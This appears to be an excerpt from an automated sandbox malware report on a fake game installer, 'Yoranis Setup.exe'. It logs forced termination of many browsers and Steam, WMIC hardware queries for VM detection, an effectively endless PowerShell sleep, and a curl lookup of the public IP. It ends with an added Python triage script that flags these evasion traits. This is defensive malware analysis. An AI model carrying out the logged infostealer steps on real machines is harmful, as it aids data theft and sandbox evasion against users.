Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9910
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libEGL.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsExec.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\elevate.exe
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\libGLESv2.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libGLESv2.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-ia32\node.napi.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\libEGL.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\System.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-x64\node.napi.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vulkan-1.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\vk_swiftshader.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\vk_swiftshader.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.node
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\dxcompiler.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\SpiderBanner.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\StdUtils.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\d3dcompiler_47.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\unrealgame\vulkan-1.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\dxcompiler.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060 Thread sleep count: 9910 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010409
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Yoranis Setup.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Yoranis Setup.exe File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked
Source: C:\Users\user\Desktop\Yoranis Setup.exe File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources
Source: C:\Users\user\Desktop\Yoranis Setup.exe File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules
Source: C:\Users\user\Desktop\Yoranis Setup.exe File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build
Source: C:\Users\user\Desktop\Yoranis Setup.exe File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\locales
Source: C:\Users\user\Desktop\Yoranis Setup.exe File opened: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js
Source: curl.exe, 0000000E.00000003.330302063852.00000201D98E1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.330302534079.00000201D98E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Yoranis Setup.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Memory allocated: page read and write | page guard
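
The two entries in this section that carry the most weight for evasion triage are the WMIC hardware queries (Win32_PhysicalMemory, Win32_BIOS) and the PowerShell thread delay of 922337203685477. That number is Int64.MaxValue in 100-nanosecond ticks expressed in milliseconds, i.e. a sleep that never returns unless the sandbox patches the delay, which is why the report also records "Sample execution stops while process was sleeping". The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses report-style behaviour lines (constructed here, modelled on the entries above, with a benign Win32_Process query as a control), flags WMI queries against the hardware classes the report treats as VM fingerprinting, and classifies sleeps as normal, long (the report's 3-minute threshold) or saturated at the Int64 limit. The delay unit is assumed to be milliseconds, which is what Thread.Sleep and Start-Sleep -Milliseconds take.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Int64.MaxValue in 100-ns ticks, expressed in milliseconds: the value the report shows.
# A sleep with this argument never returns on its own (roughly 29,000 years).
SATURATED_SLEEP_MS = (2**63 - 1) // 10_000          # 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000                       # the report's "long sleep" threshold (>= 3 min)

# WMI classes the report flags as hardware fingerprinting commonly used to detect VMs.
ANTI_VM_WMI_CLASSES = {"win32_physicalmemory", "win32_bios", "win32_baseboard"}
_WMI_FROM_RE = re.compile(r"\bFROM\s+(?P<cls>Win32_\w+)", re.IGNORECASE)

# Report-style line: "Source: <path>.exe <Behaviour>: <detail>" (assumed layout for this example)
_LINE_RE = re.compile(r"^Source:\s+(?P<src>.+?\.exe)\s+(?P<kind>[^:]+):\s+(?P<detail>.*)$")
_DELAY_RE = re.compile(r"delay time:\s*(?P<ms>-?\d+)")


@dataclass
class Event:
    source: str
    kind: str
    detail: str


def parse_event(line: str) -> Optional[Event]:
    m = _LINE_RE.match(line.strip())
    return Event(m["src"], m["kind"], m["detail"]) if m else None


def classify_sleep_ms(ms: int) -> str:
    """'saturated' = Int64 limit (sleep forever), 'long' = >= 3 min, else 'normal'."""
    ms = abs(ms)  # the report prints relative NtDelayExecution intervals as negative numbers
    if ms >= SATURATED_SLEEP_MS:
        return "saturated"
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "normal"


def anti_vm_wmi_class(detail: str) -> Optional[str]:
    """Return the queried WMI class if it is one of the VM-fingerprinting classes, else None."""
    m = _WMI_FROM_RE.search(detail)
    if m and m["cls"].lower() in ANTI_VM_WMI_CLASSES:
        return m["cls"]
    return None


def triage(lines) -> dict:
    """Walk report lines and collect anti-VM WMI queries and classified sleeps."""
    findings = {"anti_vm_wmi": [], "sleep": []}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        if ev.kind == "WMI Queries":
            cls = anti_vm_wmi_class(ev.detail)
            if cls:
                findings["anti_vm_wmi"].append((ev.source, cls))
        elif ev.kind == "Thread delayed":
            m = _DELAY_RE.search(ev.detail)
            if m:
                ms = int(m["ms"])
                findings["sleep"].append((ev.source, ms, classify_sleep_ms(ms)))
    return findings


# Constructed sample, modelled on the report's lines; the Win32_Process query is a benign control.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PhysicalMemory",
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS",
    r"Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Process",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 1500",
]

if __name__ == "__main__":
    for key, items in triage(SAMPLE_LINES).items():
        for item in items:
            print(key, item)
```

The saturated case is worth treating separately from a merely long sleep: a 5-minute delay is a timeout race against the sandbox, while an Int64-ticks delay only makes sense if the author expects the sandbox to hook the sleep and shorten it, which is exactly what the "Thread sleep time ... >= -30000s" entry records.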

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM msedge.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM brave.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM firefox.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM opera.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM kometa.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM orbitum.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM centbrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM 7star.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM sputnik.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM vivaldi.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM epicprivacybrowser.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM uran.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM yandex.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM iridium.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM chrome.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM Steam.exe /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /IM javaw.exe /F
Source: C:\Users\user\Desktop\Yoranis Setup.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq YoransSetup.exe" /FO csv | "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq YoransSetup.exe" /FO csv
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "YoransSetup.exe"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1664 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe "C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\unrealgame" --mojo-platform-channel-handle=2404 --field-trial-handle=1668,i,14286962336561294637,6963434852449483328,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM chrome.exe /F"
